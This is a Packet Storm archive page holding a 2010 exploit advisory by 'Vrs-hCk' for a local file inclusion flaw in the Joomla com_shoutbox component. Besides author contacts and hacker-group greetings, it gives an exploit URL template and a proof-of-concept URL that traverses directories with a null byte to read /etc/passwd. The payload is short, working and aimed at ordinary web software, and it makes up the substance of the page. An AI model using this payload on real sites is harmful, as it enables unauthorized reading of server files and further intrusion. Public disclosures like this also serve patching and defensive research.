Lucene search

K
packetstormVrs-hCkPACKETSTORM:88061
HistoryApr 06, 2010 - 12:00 a.m.

Joomla Shoutbox Local File Inclusion

2010-04-0600:00:00
Vrs-hCk
packetstormsecurity.com
25
` ================================================================================================  
  
Title : Joomla Component com_shoutbox LFI Vulnerability  
Download : http://joomlacode.org/gf/project/shoutbox  
  
Date : Monday, 05 April 2010 (Indonesia)  
Author : Vrs-hCk  
Contact : ander[at]antisecurity.org  
Blog : http://c0li.blogspot.com/  
  
================================================================================================  
  
[+] Exploit  
  
http://[site]/[path]/index.php?option=com_shoutbox&controller=[LFI]  
  
[+] PoC  
  
http://localhost/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00  
  
================================================================================================  
  
Greetz :  
  
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org  
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,  
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.  
  
================================================================================================  
  
# c0li.m0de.0n  
`